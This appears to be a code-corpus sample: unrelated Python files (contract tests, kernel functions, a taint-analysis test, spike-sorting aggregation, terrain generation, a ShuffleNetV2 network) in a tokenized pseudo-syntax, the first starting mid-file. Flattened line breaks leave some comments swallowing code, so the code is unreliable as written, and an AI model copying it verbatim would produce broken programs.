lst_b:List[int]<arrow><none><block_start><pass><block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You must name a snapshot if multiple arguments were given in the capture function." str(value_error))<block_end><def_stmt>test_with_no_postcondition self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:lst[:])<def_stmt>some_func lst:List[int]<arrow><none><block_start><return><block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You are decorating a function with a snapshot, "<concat>"but no postcondition was defined on the function before." str(value_error))<block_end><def_stmt>test_missing_old_attribute self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD lst:OLD.len_list<eq>lst)# We miss len_lst in OLD here! <def_stmt>some_func lst:List[int]<arrow><none><block_start><return><block_end>attribute_error=<none># type: Optional[AttributeError] <try_stmt><block_start>some_func(lst=[1 2 3])<block_end><except_stmt>AttributeError<as>error<block_start>attribute_error=error<block_end><assert_stmt>attribute_error<is><not><none><line_sep>self.assertEqual("The snapshot with the name 'len_list' is not available in the OLD of a postcondition. "<concat>"Have you decorated the function with a corresponding snapshot decorator?" str(attribute_error))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# Author: <NAME> <<EMAIL>> # License: Simplified BSD <import_from_stmt>sklearn.metrics.pairwise polynomial_kernel<import_from_stmt>sklearn.utils.extmath safe_sparse_dot<import_from_stmt>scipy.sparse issparse<import_stmt>numpy<as>np<def_stmt>safe_power X degree=2<block_start>"""Element-wise power supporting both sparse and dense data. Parameters ---------- X : ndarray or sparse The array whose entries to raise to the power. degree : int, default: 2 The power to which to raise the elements. Returns ------- X_ret : ndarray or sparse Same shape as X, but (x_ret)_ij = (x)_ij ^ degree """<if_stmt>issparse(X)<block_start><if_stmt>hasattr(X 'power')<block_start><return>X.power(degree)<block_end><else_stmt># old scipy <block_start>X=X.copy()<line_sep>X.data<augpow>degree<line_sep><return>X<block_end><block_end><else_stmt><block_start><return>X<power>degree<block_end><block_end><def_stmt>_D X P degree=2<block_start>"""The "replacement" part of the homogeneous polynomial kernel. D[i, j] = sum_k [(X_ik * P_jk) ** degree] """<line_sep><return>safe_sparse_dot(safe_power(X degree) P.T<power>degree)<block_end><def_stmt>homogeneous_kernel X P degree=2<block_start>"""Convenience alias for homogeneous polynomial kernel between X and P:: K_P(x, p) = <x, p> ^ degree Parameters ---------- X : ndarray of shape (n_samples_1, n_features) Y : ndarray of shape (n_samples_2, n_features) degree : int, default 2 Returns ------- Gram matrix : array of shape (n_samples_1, n_samples_2) """<line_sep><return>polynomial_kernel(X P degree=degree gamma=1 coef0=0)<block_end><def_stmt>anova_kernel X P degree=2<block_start>"""ANOVA kernel between X and P:: K_A(x, p) = sum_i1>i2>...>id x_i1 p_i1 x_i2 p_i2 ... x_id p_id See <NAME> and <NAME>, Kernel Methods for Pattern Analysis section 9.2. Parameters ---------- X : ndarray of shape (n_samples_1, n_features) Y : ndarray of shape (n_samples_2, n_features) degree : int, default 2 Returns ------- Gram matrix : array of shape (n_samples_1, n_samples_2) """<if_stmt>degree<eq>2<block_start>K=homogeneous_kernel(X P degree=2)<line_sep>K<augsub>_D(X P degree=2)<line_sep>K<augdiv>2<block_end><elif_stmt>degree<eq>3<block_start>K=homogeneous_kernel(X P degree=3)<line_sep>K<augsub>3<times>_D(X P degree=2)<times>_D(X P degree=1)<line_sep>K<augadd>2<times>_D(X P degree=3)<line_sep>K<augdiv>6<block_end><else_stmt><block_start><raise>NotImplementedError("ANOVA kernel for degree >= 4 not yet "<concat>"implemented efficiently.")<block_end><return>K<block_end><def_stmt>_poly_predict X P lams kernel degree=2<block_start><if_stmt>kernel<eq>"anova"<block_start>K=anova_kernel(X P degree)<block_end><elif_stmt>kernel<eq>"poly"<block_start>K=homogeneous_kernel(X P degree)<block_end><else_stmt><block_start><raise>ValueError(("Unsuppported kernel: {}. Use one "<concat>"of {{'anova'|'poly'}}").format(kernel))<block_end><return>np.dot(K lams)<block_end>
<def_stmt>random_choice <block_start><return>bool(GLOBAL_UNKOWN_VAR)<block_end><def_stmt>is_safe arg<block_start><return>UNKNOWN_FUNC(arg)<block_end><def_stmt>true_func <block_start><return><true><block_end><def_stmt>test_basic <block_start>s=TAINTED_STRING<if_stmt>is_safe(s)<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>is_safe(s)<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end><def_stmt>test_or <block_start>s=TAINTED_STRING<line_sep># x or y <if_stmt>is_safe(s)<or>random_choice()<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># must be tainted # not (x or y) <if_stmt><not>(is_safe(s)<or>random_choice())<block_start>ensure_tainted(s)# must be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># might be tainted # not (x or y) == not x and not y [de Morgan's laws] <if_stmt><not>is_safe(s)<and><not>random_choice()<block_start>ensure_tainted(s)# must be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end><block_end># might be tainted <def_stmt>test_and <block_start>s=TAINTED_STRING<line_sep># x and y <if_stmt>is_safe(s)<and>random_choice()<block_start>ensure_not_tainted(s)# must not be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># might be tainted # not (x and y) <if_stmt><not>(is_safe(s)<and>random_choice())<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end># not (x and y) == not x or not y [de Morgan's laws] <if_stmt><not>is_safe(s)<or><not>random_choice()<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end><def_stmt>test_tricky <block_start>s=TAINTED_STRING<line_sep>x=is_safe(s)<if_stmt>x<block_start>ensure_not_tainted(s)<block_end># FP s_=s<if_stmt>is_safe(s)<block_start>ensure_not_tainted(s_)<block_end><block_end># FP <def_stmt>test_nesting_not <block_start>s=TAINTED_STRING<if_stmt><not>(<not>(is_safe(s)))<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>(<not>(<not>(is_safe(s))))<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end># Adding `and True` makes the sanitizer trigger when it would otherwise not. See output in # SanitizedEdges.expected and compare with `test_nesting_not` and `test_basic` <def_stmt>test_nesting_not_with_and_true <block_start>s=TAINTED_STRING<if_stmt><not>(is_safe(s)<and><true>)<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><if_stmt><not>(<not>(is_safe(s)<and><true>))<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>(<not>(<not>(is_safe(s)<and><true>)))<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end>
<import_from_stmt>django.apps AppConfig<class_stmt>ResourcesConfig(AppConfig)<block_start>"""AppConfig instance for Resources app."""<line_sep>name='resources'<block_end>
<import_from_stmt>typing List Union<import_stmt>numpy<as>np<import_from_stmt>.basesorting BaseSorting BaseSortingSegment<class_stmt>UnitsAggregationSorting(BaseSorting)<block_start>""" Class that handles aggregating units from different sortings, e.g. from different channel groups. Do not use this class directly but use `si.aggregate_units(...)` """<def_stmt>__init__ self sorting_list renamed_unit_ids=<none><block_start>unit_map={}<line_sep>num_all_units=sum([sort.get_num_units()<for>sort sorting_list])<if_stmt>renamed_unit_ids<is><not><none><block_start><assert_stmt>len(np.unique(renamed_unit_ids))<eq>num_all_units "'renamed_unit_ids' doesn't have the right size"<concat>"or has duplicates!"<line_sep>unit_ids=list(renamed_unit_ids)<block_end><else_stmt><block_start>unit_ids=list(np.arange(num_all_units))<block_end># unit map maps unit ids that are used to get spike trains u_id=0<for_stmt>s_i,sorting enumerate(sorting_list)<block_start>single_unit_ids=sorting.get_unit_ids()<for_stmt>unit_id single_unit_ids<block_start>unit_map[unit_ids[u_id]]={'sorting_id':s_i 'unit_id':unit_id}<line_sep>u_id<augadd>1<block_end><block_end>sampling_frequency=sorting_list[0].get_sampling_frequency()<line_sep>num_segments=sorting_list[0].get_num_segments()<line_sep>ok1=all(sampling_frequency<eq>sort.get_sampling_frequency()<for>sort sorting_list)<line_sep>ok2=all(num_segments<eq>sort.get_num_segments()<for>sort sorting_list)<if_stmt><not>(ok1<and>ok2)<block_start><raise>ValueError("Sortings don't have the same sampling_frequency/num_segments")<block_end>BaseSorting.__init__(self sampling_frequency unit_ids)<line_sep>property_keys=sorting_list[0].get_property_keys()<line_sep>property_dict={}<for_stmt>prop_name property_keys<block_start><if_stmt>all([prop_name<in>sort.get_property_keys()<for>sort sorting_list])<block_start><for_stmt>i_s,sort enumerate(sorting_list)<block_start>prop_value=sort.get_property(prop_name)<if_stmt>i_s<eq>0<block_start>property_dict[prop_name]=prop_value<block_end><else_stmt><block_start><try_stmt><block_start>property_dict[prop_name]=np.concatenate((property_dict[prop_name] sort.get_property(prop_name)))<block_end><except_stmt>Exception<as>e<block_start>print(f"Skipping property '{prop_name}' for shape inconsistency")<del_stmt>property_dict[prop_name]<line_sep><break><block_end><block_end><block_end><block_end><block_end><for_stmt>prop_name,prop_values property_dict.items()<block_start>self.set_property(key=prop_name values=prop_values)<block_end># add segments <for_stmt>i_seg range(num_segments)<block_start>parent_segments=[sort._sorting_segments[i_seg]<for>sort sorting_list]<line_sep>sub_segment=UnitsAggregationSortingSegment(unit_map parent_segments)<line_sep>self.add_sorting_segment(sub_segment)<block_end>self._sortings=sorting_list<line_sep>self._kwargs={'sorting_list':[sort.to_dict()<for>sort sorting_list] 'renamed_unit_ids':renamed_unit_ids}<block_end>@property<def_stmt>sortings self<block_start><return>self._sortings<block_end><block_end><class_stmt>UnitsAggregationSortingSegment(BaseSortingSegment)<block_start><def_stmt>__init__ self unit_map parent_segments<block_start>BaseSortingSegment.__init__(self)<line_sep>self._unit_map=unit_map<line_sep>self._parent_segments=parent_segments<block_end><def_stmt>get_unit_spike_train self unit_id start_frame:Union[int <none>]=<none> end_frame:Union[int <none>]=<none> <arrow>np.ndarray<block_start>sorting_id=self._unit_map[unit_id]['sorting_id']<line_sep>unit_id_sorting=self._unit_map[unit_id]['unit_id']<line_sep>times=self._parent_segments[sorting_id].get_unit_spike_train(unit_id_sorting start_frame end_frame)<line_sep><return>times<block_end><block_end><def_stmt>aggregate_units sorting_list renamed_unit_ids=<none><block_start>""" Aggregates units of multiple sortings into a single sorting object Parameters ---------- sorting_list: list List of BaseSorting objects to aggregate renamed_unit_ids: array-like If given, unit ids are renamed as provided. If None, unit ids are sequential integers. Returns ------- aggregate_sorting: UnitsAggregationSorting The aggregated sorting object """<line_sep><return>UnitsAggregationSorting(sorting_list renamed_unit_ids)<block_end>
<import_stmt>numpy<import_from_stmt>noise snoise2<import_from_stmt>worldengine.model.world Step<import_from_stmt>worldengine.simulations.basic find_threshold_f<import_from_stmt>worldengine.simulations.hydrology WatermapSimulation<import_from_stmt>worldengine.simulations.irrigation IrrigationSimulation<import_from_stmt>worldengine.simulations.humidity HumiditySimulation<import_from_stmt>worldengine.simulations.temperature TemperatureSimulation<import_from_stmt>worldengine.simulations.permeability PermeabilitySimulation<import_from_stmt>worldengine.simulations.erosion ErosionSimulation<import_from_stmt>worldengine.simulations.precipitation PrecipitationSimulation<import_from_stmt>worldengine.simulations.biome BiomeSimulation<import_from_stmt>worldengine.simulations.icecap IcecapSimulation<import_from_stmt>worldengine.common anti_alias get_verbose<line_sep># ------------------ # Initial generation # ------------------ <def_stmt>center_land world<block_start>"""Translate the map horizontally and vertically to put as much ocean as possible at the borders. It operates on elevation and plates map"""<line_sep>y_sums=world.layers['elevation'].data.sum(1)# 1 == sum along x-axis y_with_min_sum=y_sums.argmin()<if_stmt>get_verbose()<block_start>print("geo.center_land: height complete")<block_end>x_sums=world.layers['elevation'].data.sum(0)# 0 == sum along y-axis x_with_min_sum=x_sums.argmin()<if_stmt>get_verbose()<block_start>print("geo.center_land: width complete")<block_end>latshift=0<line_sep>world.layers['elevation'].data=numpy.roll(numpy.roll(world.layers['elevation'].data -y_with_min_sum+latshift axis=0) -x_with_min_sum axis=1)<line_sep>world.layers['plates'].data=numpy.roll(numpy.roll(world.layers['plates'].data -y_with_min_sum+latshift axis=0) -x_with_min_sum axis=1)<if_stmt>get_verbose()<block_start>print("geo.center_land: width complete")<block_end><block_end><def_stmt>place_oceans_at_map_borders world<block_start>""" Lower the elevation near the border of the map """<line_sep>ocean_border=int(min(30 max(world.width/5 world.height/5)))<def_stmt>place_ocean x y i<block_start>world.layers['elevation'].data[y x]=(world.layers['elevation'].data[y x]<times>i)/ocean_border<block_end><for_stmt>x range(world.width)<block_start><for_stmt>i range(ocean_border)<block_start>place_ocean(x i i)<line_sep>place_ocean(x world.height-i-1 i)<block_end><block_end><for_stmt>y range(world.height)<block_start><for_stmt>i range(ocean_border)<block_start>place_ocean(i y i)<line_sep>place_ocean(world.width-i-1 y i)<block_end><block_end><block_end><def_stmt>add_noise_to_elevation world seed<block_start>octaves=8<line_sep>freq=16.0<times>octaves<for_stmt>y range(world.height)<block_start><for_stmt>x range(world.width)<block_start>n=snoise2(x/freq<times>2 y/freq<times>2 octaves base=seed)<line_sep>world.layers['elevation'].data[y x]<augadd>n<block_end><block_end><block_end><def_stmt>fill_ocean elevation sea_level#TODO: Make more use of numpy? <block_start>height,width=elevation.shape<line_sep>ocean=numpy.zeros(elevation.shape dtype=bool)<line_sep>to_expand=[]<for_stmt>x range(width)#handle top and bottom border of the map <block_start><if_stmt>elevation[0 x]<le>sea_level<block_start>to_expand.append((x 0))<block_end><if_stmt>elevation[height-1 x]<le>sea_level<block_start>to_expand.append((x height-1))<block_end><block_end><for_stmt>y range(height)#handle left- and rightmost border of the map <block_start><if_stmt>elevation[y 0]<le>sea_level<block_start>to_expand.append((0 y))<block_end><if_stmt>elevation[y width-1]<le>sea_level<block_start>to_expand.append((width-1 y))<block_end><block_end><for_stmt>t to_expand<block_start>tx,ty=t<if_stmt><not>ocean[ty tx]<block_start>ocean[ty tx]=<true><for_stmt>px,py _around(tx ty width height)<block_start><if_stmt><not>ocean[py px]<and>elevation[py px]<le>sea_level<block_start>to_expand.append((px py))<block_end><block_end><block_end><block_end><return>ocean<block_end><def_stmt>initialize_ocean_and_thresholds world ocean_level=1.0<block_start>""" Calculate the ocean, the sea depth and the elevation thresholds :param world: a world having elevation but not thresholds :param ocean_level: the elevation representing the ocean level :return: nothing, the world will be changed """<line_sep>e=world.layers['elevation'].data<line_sep>ocean=fill_ocean(e ocean_level)<line_sep>hl=find_threshold_f(e 0.10)# the highest 10% of all (!) land are declared hills ml=find_threshold_f(e 0.03)# the highest 3% are declared mountains e_th=[('sea' ocean_level) ('plain' hl) ('hill' ml) ('mountain' <none>)]<line_sep>harmonize_ocean(ocean e ocean_level)<line_sep>world.ocean=ocean<line_sep>world.elevation=(e e_th)<line_sep>world.sea_depth=sea_depth(world ocean_level)<block_end><def_stmt>harmonize_ocean ocean elevation ocean_level<block_start>""" The goal of this function is to make the ocean floor less noisy. The underwater erosion should cause the ocean floor to be more uniform """<line_sep>shallow_sea=ocean_level<times>0.85<line_sep>midpoint=shallow_sea/2.0<line_sep>ocean_points=numpy.logical_and(elevation<l>shallow_sea ocean)<line_sep>shallow_ocean=numpy.logical_and(elevation<l>midpoint ocean_points)<line_sep>elevation[shallow_ocean]=midpoint-((midpoint-elevation[shallow_ocean])/5.0)<line_sep>deep_ocean=numpy.logical_and(elevation<g>midpoint ocean_points)<line_sep>elevation[deep_ocean]=midpoint+((elevation[deep_ocean]-midpoint)/5.0)<block_end># ---- # Misc # ---- <def_stmt>sea_depth world sea_level# a dynamic programming approach to gather how far the next land is # from a given coordinate up to a maximum distance of max_radius # result is 0 for land coordinates and -1 for coordinates further than # max_radius away from land # there might be even faster ways but it does the trick <block_start><def_stmt>next_land_dynamic ocean max_radius=5<block_start>next_land=numpy.full(ocean.shape -1 int)<line_sep># non ocean tiles are zero distance away from next land next_land[numpy.logical_not(ocean)]=0<line_sep>height,width=ocean.shape<for_stmt>dist range(max_radius)<block_start>indices=numpy.transpose(numpy.where(next_land<eq>dist))<for_stmt>y,x indices<block_start><for_stmt>dy range(-1 2)<block_start>ny=y+dy<if_stmt>0<le>ny<l>height<block_start><for_stmt>dx range(-1 2)<block_start>nx=x+dx<if_stmt>0<le>nx<l>width<block_start><if_stmt>next_land[ny nx]<eq>-1<block_start>next_land[ny nx]=dist+1<block_end><block_end><block_end><block_end><block_end><block_end><block_end><return>next_land<block_end># We want to multiply the raw sea_depth by one of these factors # depending on the distance from the next land # possible TODO: make this a parameter factors=[0.0 0.3 0.5 0.7 0.9]<line_sep>next_land=next_land_dynamic(world.layers['ocean'].data)<line_sep>sea_depth=sea_level-world.layers['elevation'].data<for_stmt>y range(world.height)<block_start><for_stmt>x range(world.width)<block_start>dist_to_next_land=next_land[y x]<if_stmt>dist_to_next_land<g>0<block_start>sea_depth[y x]<augmul>factors[dist_to_next_land-1]<block_end><block_end><block_end>sea_depth=anti_alias(sea_depth 10)<line_sep>min_depth=sea_depth.min()<line_sep>max_depth=sea_depth.max()<line_sep>sea_depth=(sea_depth-min_depth)/(max_depth-min_depth)<line_sep><return>sea_depth<block_end><def_stmt>_around x y width height<block_start>ps=[]<for_stmt>dx range(-1 2)<block_start>nx=x+dx<if_stmt>0<le>nx<l>width<block_start><for_stmt>dy range(-1 2)<block_start>ny=y+dy<if_stmt>0<le>ny<l>height<and>(dx<ne>0<or>dy<ne>0)<block_start>ps.append((nx ny))<block_end><block_end><block_end><block_end><return>ps<block_end><def_stmt>generate_world w step<block_start><if_stmt>isinstance(step str)<block_start>step=Step.get_by_name(step)<block_end><if_stmt><not>step.include_precipitations<block_start><return>w<block_end># Prepare sufficient seeds for the different steps of the generation rng=numpy.random.RandomState(w.seed)# create a fresh RNG in case the global RNG is compromised (i.e. has been queried an indefinite amount of times before generate_world() was called) sub_seeds=rng.randint(0 numpy.iinfo(numpy.int32).max size=100)# choose lowest common denominator (32 bit Windows numpy cannot handle a larger value) seed_dict={'PrecipitationSimulation':sub_seeds[0] # after 0.19.0 do not ever switch out the seeds here to maximize seed-compatibility 'ErosionSimulation':sub_seeds[1] 'WatermapSimulation':sub_seeds[2] 'IrrigationSimulation':sub_seeds[3] 'TemperatureSimulation':sub_seeds[4] 'HumiditySimulation':sub_seeds[5] 'PermeabilitySimulation':sub_seeds[6] 'BiomeSimulation':sub_seeds[7] 'IcecapSimulation':sub_seeds[8] '':sub_seeds[99]}<line_sep>TemperatureSimulation().execute(w seed_dict['TemperatureSimulation'])<line_sep># Precipitation with thresholds PrecipitationSimulation().execute(w seed_dict['PrecipitationSimulation'])<if_stmt><not>step.include_erosion<block_start><return>w<block_end>ErosionSimulation().execute(w seed_dict['ErosionSimulation'])# seed not currently used <if_stmt>get_verbose()<block_start>print("...erosion calculated")<block_end>WatermapSimulation().execute(w seed_dict['WatermapSimulation'])# seed not currently used # FIXME: create setters IrrigationSimulation().execute(w seed_dict['IrrigationSimulation'])# seed not currently used HumiditySimulation().execute(w seed_dict['HumiditySimulation'])# seed not currently used PermeabilitySimulation().execute(w seed_dict['PermeabilitySimulation'])<line_sep>cm,biome_cm=BiomeSimulation().execute(w seed_dict['BiomeSimulation'])# seed not currently used <for_stmt>cl cm.keys()<block_start>count=cm[cl]<if_stmt>get_verbose()<block_start>print("%s = %i"%(str(cl) count))<block_end><block_end><if_stmt>get_verbose()<block_start>print('')# empty line print('Biome obtained:')<block_end><for_stmt>cl biome_cm.keys()<block_start>count=biome_cm[cl]<if_stmt>get_verbose()<block_start>print(" %30s = %7i"%(str(cl) count))<block_end><block_end>IcecapSimulation().execute(w seed_dict['IcecapSimulation'])# makes use of temperature-map <return>w<block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<class_stmt>Conv_BN_ReLU(nn.Module)<block_start><def_stmt>__init__ self in_channel out_channel k_size stride=1 padding=0 groups=1 has_bn=<true> has_relu=<true> gaussian_init=<false><block_start>super(Conv_BN_ReLU self).__init__()<line_sep>self.conv=nn.Conv2d(in_channel out_channel kernel_size=k_size stride=stride padding=padding groups=groups bias=<false>)<if_stmt>gaussian_init<block_start>nn.init.normal_(self.conv.weight.data 0 0.01)<block_end><if_stmt>has_bn<block_start>self.bn=nn.BatchNorm2d(out_channel)<block_end>self.has_bn=has_bn<line_sep>self.has_relu=has_relu<if_stmt>has_relu<block_start>self.relu=nn.ReLU(inplace=<true>)<block_end><block_end><def_stmt>forward self x<block_start>x=self.conv(x)<if_stmt>self.has_bn<block_start>x=self.bn(x)<block_end><if_stmt>self.has_relu<block_start>x=self.relu(x)<block_end><return>x<block_end><block_end><class_stmt>FC(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels<block_start>super(FC self).__init__()<line_sep>self.fc=nn.Linear(in_channels out_channels)<line_sep>nn.init.normal_(self.fc.weight.data 0 0.01)<block_end><def_stmt>forward self x<block_start><return>self.fc(x)<block_end><block_end><class_stmt>ExtraLabelPredict(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels num_classes=1000<block_start>super(ExtraLabelPredict self).__init__()<line_sep>self.num_classes=num_classes<line_sep>self.maxpool=nn.MaxPool2d(kernel_size=3 stride=2 padding=1)<line_sep>self.conv=nn.Sequential(Conv_BN_ReLU(in_channels out_channels 1 1 0) Conv_BN_ReLU(out_channels out_channels 3 1 1))<line_sep>self.globalpool=nn.AdaptiveAvgPool2d(output_size=1)<line_sep>self.fc=nn.Linear(out_channels num_classes)<block_end><def_stmt>forward self inputs<block_start>inputs=self.maxpool(inputs)<line_sep>inputs=self.conv(inputs)<line_sep>inputs=self.globalpool(inputs)<line_sep>inputs=inputs.view(inputs.size(0) -1)<line_sep>inputs=self.fc(inputs)<line_sep><return>inputs<block_end><block_end><class_stmt>ShuffleV2Block(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels mid_channels stride groups has_proj=<false> has_se=<false><block_start>super(ShuffleV2Block self).__init__()<line_sep>self.stride=stride<assert_stmt>stride<in>[1 2]<line_sep>self.has_proj=has_proj<line_sep>self.has_se=has_se<line_sep>self.relu=nn.ReLU(inplace=<true>)<if_stmt>has_proj<block_start>self.proj=Conv_BN_ReLU(in_channels out_channels-mid_channels k_size=3 stride=stride padding=1 has_bn=<true> has_relu=<true>)<block_end>self.branch_main=nn.Sequential(Conv_BN_ReLU(in_channels out_channels k_size=1 stride=1 padding=0 has_bn=<true> has_relu=<true>) Conv_BN_ReLU(out_channels out_channels k_size=3 stride=stride padding=1 groups=groups has_bn=<true> has_relu=<true>) Conv_BN_ReLU(out_channels out_channels k_size=3 stride=1 padding=1 groups=out_channels has_bn=<true> has_relu=<false>) Conv_BN_ReLU(out_channels mid_channels k_size=1 stride=1 padding=0 has_bn=<true> has_relu=<false>) )<if_stmt>has_se<block_start>self.se_globalpool=nn.AdaptiveAvgPool2d(output_size=1)<line_sep>self.se_fc1=FC(mid_channels mid_channels<floordiv>4)<line_sep>self.se_fc2=FC(mid_channels<floordiv>4 mid_channels)<line_sep>se_block=[self.se_fc1 nn.ReLU(inplace=<true>) self.se_fc2 nn.Sigmoid() ]<line_sep>self.se_block=nn.Sequential(*se_block)<block_end><block_end><def_stmt>forward self old_x<block_start><if_stmt>self.has_proj<block_start>proj,x=old_x old_x<block_end><else_stmt><block_start>proj,x=self.channel_shuffle(old_x)<block_end>x_proj=x<if_stmt>self.has_proj<block_start>proj=self.proj(proj)<block_end>x=self.branch_main(x)<if_stmt>self.has_se<block_start>se_scale=self.se_globalpool(x).view(x.size(0) -1)<line_sep>se_scale=self.se_block(se_scale).unsqueeze(-1).unsqueeze(-1)<line_sep>x=x<times>se_scale<block_end><if_stmt><not>self.has_proj<block_start>x=self.relu(x_proj+x)<block_end>x=torch.cat((proj x) dim=1)<line_sep><return>x<block_end><def_stmt>channel_shuffle self x<block_start>batchsize,num_channels,height,width=x.data.size()<assert_stmt>(num_channels%4<eq>0)<line_sep>x=x.reshape(batchsize<times>num_channels<floordiv>2 2 height<times>width)<line_sep>x=x.permute(1 0 2)<line_sep>x=x.reshape(2 -1 num_channels<floordiv>2 height width)<line_sep><return>x[0] x[1]<block_end><block_end><class_stmt>ShuffleNetV2(nn.Module)<block_start><def_stmt>__init__ self n_class=1000 model_size='ExLarge'<block_start>super(ShuffleNetV2 self).__init__()<line_sep>self.stage_repeats=[4 8 4]<line_sep>self.model_size=model_size<if_stmt>model_size<eq>'ExLarge'<block_start>self.pre=[2 3 4 5]<line_sep>self.stage_repeats=[8 16 36 10]<line_sep>self.outputs=[320 640 1280 2560]<line_sep>self.enable_stride=[<false> <true> <true> <true>]<block_end><else_stmt><block_start><raise>NotImplementedError<block_end>self.first_conv=nn.Sequential(Conv_BN_ReLU(3 64 k_size=3 stride=2 padding=1) Conv_BN_ReLU(64 128 k_size=3 stride=1 padding=1) Conv_BN_ReLU(128 256 k_size=3 stride=1 padding=1) )<line_sep>self.maxpool=nn.MaxPool2d(kernel_size=3 stride=2 padding=1)<line_sep>self.features=nn.ModuleList()<line_sep>input_channel=256<if_stmt>model_size<eq>'ExLarge'<block_start><for_stmt>p,s,o,es zip(self.pre self.stage_repeats self.outputs self.enable_stride)<block_start>feature=[]<for_stmt>i range(s)<block_start>prefix="{}{}".format(p str(i))<line_sep>stride=1<if><not>es<or>i<g>0<else>2<line_sep>has_proj=<false><if>i<g>0<else><true><line_sep>feature.append(ShuffleV2Block(in_channels=input_channel out_channels=o mid_channels=o<floordiv>2 stride=stride groups=16 has_proj=has_proj has_se=<true>))<line_sep>input_channel=o<floordiv>2<block_end>feature.append(Conv_BN_ReLU(o o k_size=1 stride=1 padding=0))<line_sep>input_channel=o<line_sep>feature=nn.Sequential(*feature)<line_sep>self.features.append(feature)<if_stmt>p<eq>2<block_start>self.predict_56=ExtraLabelPredict(in_channels=320 out_channels=256)<block_end><elif_stmt>p<eq>3<block_start>self.predict_28=ExtraLabelPredict(in_channels=640 out_channels=512)<block_end><elif_stmt>p<eq>4<block_start>self.predict_14=ExtraLabelPredict(in_channels=1280 out_channels=1024)<block_end><block_end><block_end>self.globalpool=nn.AvgPool2d(7)<if_stmt>self.model_size<eq>'ExLarge'<block_start>self.dropout=nn.Dropout(0.2)<block_end>self.fc=FC(2560 n_class)<line_sep>self._initialize_weights()<block_end><def_stmt>_initialize_weights self<block_start><for_stmt>name,m self.named_modules()<block_start><if_stmt>isinstance(m nn.Conv2d)<block_start><if_stmt>'first'<in>name<block_start>nn.init.normal_(m.weight 0 0.01)<block_end><else_stmt><block_start>nn.init.normal_(m.weight 0 1.0/m.weight.shape[1])<block_end><if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0)<block_end><block_end><elif_stmt>isinstance(m nn.BatchNorm2d)<block_start>nn.init.constant_(m.weight 1)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0.0001)<block_end>nn.init.constant_(m.running_mean 0)<block_end><elif_stmt>isinstance(m nn.BatchNorm1d)<block_start>nn.init.constant_(m.weight 1)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0.0001)<block_end>nn.init.constant_(m.running_mean 0)<block_end><elif_stmt>isinstance(m nn.Linear)<block_start>nn.init.normal_(m.weight 0 0.01)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0)<block_end><block_end><block_end><block_end><def_stmt>forward self x<block_start>x=self.first_conv(x)<line_sep>x=self.maxpool(x)<line_sep># 1 * 256 * 56 * 56 x=self.features[0](x)<line_sep># 1 * 320 * 56 * 56 <if_stmt>self.training<block_start>predict_56=self.predict_56(x)<block_end>x=self.features[1](x)<line_sep># 1 * 640 * 28 * 28 <if_stmt>self.training<block_start>predict_28=self.predict_28(x)<block_end>x=self.features[2](x)<line_sep># 1 * 1280 * 14 * 14 <if_stmt>self.training<block_start>predict_14=self.predict_14(x)<block_end>x=self.features[3](x)<line_sep># 1 * 2560 * 7 * 7 x=self.globalpool(x)<if_stmt>self.model_size<eq>'ExLarge'<block_start>x=self.dropout(x)<block_end>x=x.reshape(x.size(0) -1)<line_sep>x=self.fc(x)<if_stmt>self.training# Loss is scaled by 1.0, 0.7, 0.5, 0.3 <block_start><return>x predict_14 predict_28 predict_56<block_end><else_stmt><block_start><return>x<block_end><block_end><block_end><def_stmt>create_network <block_start>model=ShuffleNetV2()<line_sep><return>model<block_end><if_stmt>__name__<eq>"__main__"<block_start>create_network()<block_end>
